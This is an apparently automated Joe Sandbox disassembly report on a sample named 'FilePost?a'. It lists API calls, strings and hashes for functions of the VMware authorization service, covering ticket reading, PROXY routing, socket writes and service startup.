                                                    • Opcode Fuzzy Hash: 63d62d2bf160ea885ba62063a6d9cc1f33adf31e6635db80e7ad8c8c0bf20e97
                                                    • Instruction Fuzzy Hash: 9451BD70A012059FCB209F69ED41A9ABBF4FF48304F14502BFA55FB361D771AA4ACB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,?,00000000,?,?,00000000), ref: 00ED7B16
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,00000000), ref: 00ED7B48
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,00000000), ref: 00ED7B5C
                                                    • Warning.VMWAREBASE([Ticket] Cannot read %s: %s.,00ED810A,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00ED7B68
                                                    • memchr.VCRUNTIME140(?,0000000A,?,?,?,?,?,?,?,?,00000000), ref: 00ED7B99
                                                    • Warning.VMWAREBASE([Ticket] Cannot seek to the beginning of %s.,00ED810A,?,?,?,00000000), ref: 00ED7CAE
                                                    Strings
                                                    • [Ticket] Cannot read %s: %s., xrefs: 00ED7B63
                                                    • [Ticket] Cannot read %s: ticket on disk is truncated., xrefs: 00ED7BF5
                                                    • [Ticket] Cannot find end of %s: %s., xrefs: 00ED7C66
                                                    • [Ticket] Cannot find end of %s: ticket on disk is truncated., xrefs: 00ED7C57
                                                    • [Ticket] Cannot seek to the beginning of %s., xrefs: 00ED7CA9
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$memchr
                                                    • String ID: [Ticket] Cannot find end of %s: %s.$[Ticket] Cannot find end of %s: ticket on disk is truncated.$[Ticket] Cannot read %s: %s.$[Ticket] Cannot read %s: ticket on disk is truncated.$[Ticket] Cannot seek to the beginning of %s.
                                                    • API String ID: 2802726676-2402547190
                                                    • Opcode ID: 1ca059033c71e2ec48a445b06315e84316e2d945d2e5586c7a673ca95a533be6
                                                    • Instruction ID: 8862a09b599239279c5992f10890ef126e140ddabaed0107677a65258800745e
                                                    • Opcode Fuzzy Hash: 1ca059033c71e2ec48a445b06315e84316e2d945d2e5586c7a673ca95a533be6
                                                    • Instruction Fuzzy Hash: 3251EC72B041085FDB20DF68DD42BEDB3F9DB94314F10109BE989B7341EA715E828B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(Received PROXY command for %s, session = %s,?,?), ref: 00ED1282
                                                    • Warning.VMWAREBASE(%s: routing vpxa NFC connection to hostd.,VMAuthdPROXYCommand), ref: 00ED12C9
                                                    • Warning.VMWAREBASE(%s: routing vpxa NFC SSL connection to hostd.,VMAuthdPROXYCommand), ref: 00ED1318
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: %s: routing vpxa NFC SSL connection to hostd.$%s: routing vpxa NFC connection to hostd.$PROXY service %s not found.$Received PROXY command for %s, session = %s$VMAuthdPROXYCommand$ha-nfc$ha-nfcssl$nfc$nfcssl$vmware-hostd$vpxa-nfc$vpxa-nfcssl
                                                    • API String ID: 2415109466-2929834238
                                                    • Opcode ID: e92237ea31f69d89c3dc3331b8c536f4c2c9f37309d8779e3719722459a3c56f
                                                    • Instruction ID: 03ae3ee2b6965dc4f384e9e033ea837db56d7f4da82310e8f04acd9d5f546b09
                                                    • Opcode Fuzzy Hash: e92237ea31f69d89c3dc3331b8c536f4c2c9f37309d8779e3719722459a3c56f
                                                    • Instruction Fuzzy Hash: 5541B211A082803AC7211B7469A27B62B97CB67788B4E35E3D885FF752E1039D0B8292
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(00000002,00000000,?,00000000,?,00ED6AB7,00000000,00000000,00000000,?,00000000), ref: 00ED65D9
                                                    • wcschr.VCRUNTIME140(00000000,0000003D,00000000), ref: 00ED6624
                                                    • wcschr.VCRUNTIME140(00000000,0000003D,?,?,?,?,?,?,?,00000000), ref: 00ED664B
                                                    • CompareStringOrdinal.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 00ED6672
                                                    • CompareStringOrdinal.KERNEL32(00000000,000000FF,00000000,?,00000001,?,?,?,?,?,00000000), ref: 00ED66CD
                                                    • memcpy.VCRUNTIME140(00000000,00000000,-00000001,?,?,00000000), ref: 00ED676B
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000), ref: 00ED67D6
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    Strings
                                                    • The system environment block is too long. Please fix your environment block and try again., xrefs: 00ED6556
                                                    • Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 00ED67BF
                                                    • Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again., xrefs: 00ED6796
                                                    • The child environment block is too long. Please fix your environment block and try again., xrefs: 00ED65AE
                                                    • The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 00ED678D
                                                    • Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again., xrefs: 00ED67AB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CompareErrorLastOrdinalStringwcschr$_printffreememcpy
                                                    • String ID: Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again.$Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again.$The child environment block is too long. Please fix your environment block and try again.$The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.$The system environment block is too long. Please fix your environment block and try again.$Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.
                                                    • API String ID: 1816562336-76596275
                                                    • Opcode ID: 0d12d636acddc0f3af517d6b2960868d840823b26850835be46e842c5ed8b95f
                                                    • Instruction ID: 9bc814760c3ab7eee9f3827f74928042707086479b99412e35d0173bb4db5ac8
                                                    • Opcode Fuzzy Hash: 0d12d636acddc0f3af517d6b2960868d840823b26850835be46e842c5ed8b95f
                                                    • Instruction Fuzzy Hash: C191C035E002159BCB24DF68DC41ABEB7B5EF84708F19519BE916BB380E771AE42C790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • isgraph.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00ED7FAD,?,00000000,?,?,00000000), ref: 00ED79C5
                                                    • Warning.VMWAREBASE([Ticket] Failed to setup ticket dir (service: %s).,none,?,00000000), ref: 00ED7A34
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,[Ticket] Failed to setup ticket dir (service: %s).,none,?,00000000), ref: 00ED7A3C
                                                    • Warning.VMWAREBASE([Ticket] Non-graphic character in the ticket.,?,?,?,00ED7FAD,?,00000000,?,?,00000000), ref: 00ED7A5D
                                                    • Warning.VMWAREBASE([Ticket] Illegal character in the ticket.,?,?,00000000,?,?,00ED7FAD,?,00000000), ref: 00ED7A7D
                                                    • Warning.VMWAREBASE(00000000,%s%s%s,00000000,vmtck-,?,?,00000000), ref: 00ED7AAB
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s%s%s,00000000,vmtck-,?,?,00000000), ref: 00ED7AB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$isgraph
                                                    • String ID: %s%s%s$[Ticket] Failed to setup ticket dir (service: %s).$[Ticket] Illegal character in the ticket.$[Ticket] Non-graphic character in the ticket.$none$vmtck-
                                                    • API String ID: 3385091950-1776490052
                                                    • Opcode ID: d8cd1aa215fb2e33ea0d86ab9aa5c90d5b03c1d85da405115de59d947c823be8
                                                    • Instruction ID: 53d7805975eb0d2a8cf156b28bac2d871b289e3313c9f360bd70daab63791b39
                                                    • Opcode Fuzzy Hash: d8cd1aa215fb2e33ea0d86ab9aa5c90d5b03c1d85da405115de59d947c823be8
                                                    • Instruction Fuzzy Hash: 61310971B042099BDF10AFA9AC427FEB7A4DF44309F0410ABED49B7342FA215A1B8791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$Info
                                                    • String ID:
                                                    • API String ID: 2509303402-0
                                                    • Opcode ID: 877cd37a74fd30be6ff93f21f8c6eb4645add747d1025197f4e5eedab69ebb41
                                                    • Instruction ID: 9131ef9baf839c90e400adb40db282fa84ce9a80963871aee1b003a1bd9444c1
                                                    • Opcode Fuzzy Hash: 877cd37a74fd30be6ff93f21f8c6eb4645add747d1025197f4e5eedab69ebb41
                                                    • Instruction Fuzzy Hash: FFD18D71A022059FDB11CFA8C880BEEBBF5FF09308F14416AE995A7791D775A845CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000406,?,?,?), ref: 00ED39D9
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?), ref: 00ED3A21
                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00ED3A2B
                                                    • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?), ref: 00ED3A49
                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00ED3A97
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AD1
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AEE
                                                    Strings
                                                    • send timed-out waiting for data on connection. aborting., xrefs: 00ED3A53
                                                    • %s(): send() FAIL: %d., xrefs: 00ED3AA3
                                                    • %s(): writing to closed socket: %s., xrefs: 00ED3B40
                                                    • VMAuthdSocketWrite, xrefs: 00ED3A9E, 00ED3AB2, 00ED3B3B
                                                    • %s: write failed. Closing socket for writing., xrefs: 00ED3AB7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CloseHandleObjectSingleWait
                                                    • String ID: %s(): send() FAIL: %d.$%s(): writing to closed socket: %s.$%s: write failed. Closing socket for writing.$VMAuthdSocketWrite$send timed-out waiting for data on connection. aborting.
                                                    • API String ID: 3682901111-525854830
                                                    • Opcode ID: 7b3b0546f34ed163a2097f3f388bb800e6262ccc4581abda3fb7a0a6dc509acc
                                                    • Instruction ID: 4f10896490f9806e90be0d1dcdc6a3760f05d0c1eca67ad82f2b4cd2fc6ad263
                                                    • Opcode Fuzzy Hash: 7b3b0546f34ed163a2097f3f388bb800e6262ccc4581abda3fb7a0a6dc509acc
                                                    • Instruction Fuzzy Hash: 10411971700209AFD724AB38DC45BE5B3A4EB00728F00176BE969B73C1DB719A5A9791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000400,%s-fd,00ED13A6,?,ha-nfcssl), ref: 00ED3592
                                                    • Warning.VMWAREBASE(?,?,FFFFFFFF,?,?,?,00000400,%s-fd,00ED13A6,?,ha-nfcssl), ref: 00ED35C4
                                                      • Part of subcall function 00ED6EA0: RevertToSelf.ADVAPI32(00ED35D3,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED6E80
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    • Warning.VMWAREBASE(FFFFFFFF,?,000000FF,00EDA6D7,00000000,?,00000000,?,?,?), ref: 00ED3638
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED3651
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED366E
                                                    • CloseHandle.KERNEL32(FFFFFFFF,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED36A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CloseHandle$RevertSelf
                                                    • String ID: %s-fd$Connect %s$Error connecting to %s service instance.$NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\authdWin32.c$ha-nfcssl
                                                    • API String ID: 3821156272-2383663668
                                                    • Opcode ID: a592a8fd02537f2bbe79de35724cab1e595313bbded32a26b4f03940ba9626b1
                                                    • Instruction ID: 2f03f18991f92193cbb087e13d1840e2807475a8bd9e3ec5386b10e73a041c86
                                                    • Opcode Fuzzy Hash: a592a8fd02537f2bbe79de35724cab1e595313bbded32a26b4f03940ba9626b1
                                                    • Instruction Fuzzy Hash: 664181B1600609BBDB24DF34CD81F99B7A8EB04714F001356F728B73D1DB30AA568BA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterServiceCtrlHandlerW.ADVAPI32(VMAuthdService,Function_00004280), ref: 00ED5A1C
                                                    • GetLastError.KERNEL32 ref: 00ED5A2B
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • SetServiceStatus.ADVAPI32(00EE1040), ref: 00ED5A95
                                                    • GetLastError.KERNEL32 ref: 00ED5A9F
                                                    Strings
                                                    • SetServiceStatus error on failure %ld, xrefs: 00ED5AA6
                                                    • VMAuthdService, xrefs: 00ED59F9
                                                    • SetServiceStatus error %ld, xrefs: 00ED5AD6
                                                    • Service Started., xrefs: 00ED5AE5
                                                    • RegisterServiceCtrlHandler failed %d, xrefs: 00ED5A32
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$ServiceWarning$CtrlHandlerRegisterStatus_printf
                                                    • String ID: RegisterServiceCtrlHandler failed %d$Service Started.$SetServiceStatus error %ld$SetServiceStatus error on failure %ld$VMAuthdService
                                                    • API String ID: 2840417057-1304299312
                                                    • Opcode ID: 8832d356aff54ea71ce90010b8ab0f380f9fd9259961ac2ec3a7a912180e5ebb
                                                    • Instruction ID: 621afc0ba513330bf95403e5d0170271c1ed8a662f08e18d293d33ed5453cc64
                                                    • Opcode Fuzzy Hash: 8832d356aff54ea71ce90010b8ab0f380f9fd9259961ac2ec3a7a912180e5ebb
                                                    • Instruction Fuzzy Hash: 0521D5B15413899FD3106F52FC8BB293768E710749F0051ABF904B9391E7B689DD8B62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CFDB368,00000FA0,?,?,6CF77CF4), ref: 6CF77D22
                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,6CF77CF4), ref: 6CF77D2D
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6CF77CF4), ref: 6CF77D3E
                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6CF77D50
                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6CF77D5E
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,6CF77CF4), ref: 6CF77D81
                                                    • DeleteCriticalSection.KERNEL32(6CFDB368,00000007,?,?,6CF77CF4), ref: 6CF77D9D
                                                    • CloseHandle.KERNEL32(00000000,?,?,6CF77CF4), ref: 6CF77DAD
                                                    Strings
                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 6CF77D28
                                                    • kernel32.dll, xrefs: 6CF77D39
                                                    • SleepConditionVariableCS, xrefs: 6CF77D4A
                                                    • WakeAllConditionVariable, xrefs: 6CF77D56
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 2565136772-3242537097
                                                    • Opcode ID: 1fc53b841a6bb6dff2a1e8642784b3dde3a37fdb6b59e1d28cb73391f6d0a0a8
                                                    • Instruction ID: 443a726ab103fb4b4b34e9a0b5bb8b583d3405c7aadfa375b605803703e7439c
                                                    • Opcode Fuzzy Hash: 1fc53b841a6bb6dff2a1e8642784b3dde3a37fdb6b59e1d28cb73391f6d0a0a8
                                                    • Instruction Fuzzy Hash: CA01B135F21601ABEFE10FB5AA0CB667AFCEF8A7457200817F904D2A20EB21D8009671
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000000), ref: 00ED2625
                                                    • Warning.VMWAREBASE(00000000,vmware,?,00000000), ref: 00ED2632
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,vmware,?,00000000), ref: 00ED2638
                                                    • Warning.VMWAREBASE ref: 00ED263E
                                                    • Warning.VMWAREBASE(?), ref: 00ED2647
                                                    • Warning.VMWAREBASE(?,?), ref: 00ED2665
                                                    • Warning.VMWAREBASE(00000001,authd.policy.allowRCForRead,?,?), ref: 00ED2671
                                                    • Warning.VMWAREBASE(0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 00ED2682
                                                    • Warning.VMWAREBASE(?,0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 00ED268D
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,?,00000000,00000000,?,00ED269A), ref: 00ED2864
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,00000000,00000000,?,00ED269A), ref: 00ED2871
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,00ED269A), ref: 00ED2887
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000003,log.syslogMinLevel,00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,00ED269A), ref: 00ED2894
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED289C
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28A3
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28A9
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28AF
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28B5
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28BB
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00ED28C7
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00ED28D2
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,00000000,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED28E7
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED28F6
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED2910
                                                      • Part of subcall function 00ED2850: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED2918
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED292B
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2939
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2949
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2956
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000003,log.logMinLevel,00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?), ref: 00ED2963
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00ED296B
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00ED2972
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00ED2978
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
